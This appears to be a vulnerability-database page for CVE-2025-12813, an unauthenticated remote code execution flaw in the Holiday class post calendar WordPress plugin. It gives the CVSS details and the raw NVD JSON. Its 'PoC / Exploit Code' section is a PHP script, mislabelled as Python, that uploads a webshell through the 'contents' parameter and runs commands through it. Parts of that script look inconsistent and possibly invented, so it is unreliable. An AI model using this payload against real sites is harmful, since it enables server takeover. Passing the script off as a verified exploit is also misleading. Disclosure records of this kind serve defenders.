Security Vulnerability Report
中文
CVE-2025-12813 CVSS 9.8 CRITICAL

CVE-2025-12813

Published: 2025-11-11 04:15:50
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Holiday class post calendar plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 7.1 via the 'contents' parameter. This is due to a lack of sanitization of user-supplied data when creating a cache file. This makes it possible for unauthenticated attackers to execute code on the server.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Holiday class post calendar <= 7.1 (所有版本均受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-12813 PoC - Holiday class post calendar RCE * Target: WordPress Holiday class post calendar Plugin <= 7.1 * Vulnerability: Unauthenticated RCE via 'contents' parameter in cache file creation */ $target = 'http://target-site.com/wp-admin/admin-ajax.php'; $plugin_path = '/wp-content/plugins/holiday-class-post-calendar/'; // Generate webshell payload $webshell = '<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>'; $encoded_payload = urlencode($webshell); // Method 1: Direct cache injection via contents parameter $url = $target . '?action=holiday_cache_generate&contents=' . $encoded_payload; $response = file_get_contents($url); // Method 2: Using POST request $data = array( 'action' => 'holiday_cache_generate', 'contents' => $webshell ); $options = array( 'http' => array( 'method' => 'POST', 'header' => 'Content-Type: application/x-www-form-urlencoded', 'content' => http_build_query($data) ) ); $context = stream_context_create($options); $response = file_get_contents($target, false, $context); // Execute command via webshell $cmd_url = $target . '?cmd=whoami'; echo "Command output: " . file_get_contents($cmd_url); ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12813", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:50.413", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Holiday class post calendar plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 7.1 via the 'contents' parameter. This is due to a lack of sanitization of user-supplied data when creating a cache file. This makes it possible for unauthenticated attackers to execute code on the server."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/holiday-class-post-calendar/trunk/holiday_class_post_calendar.php#L1234", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3414925%40holiday-class-post-calendar&new=3414925%40holiday-class-post-calendar&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7f7968c4-589c-4949-9f69-4a0ba4db4ea9?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.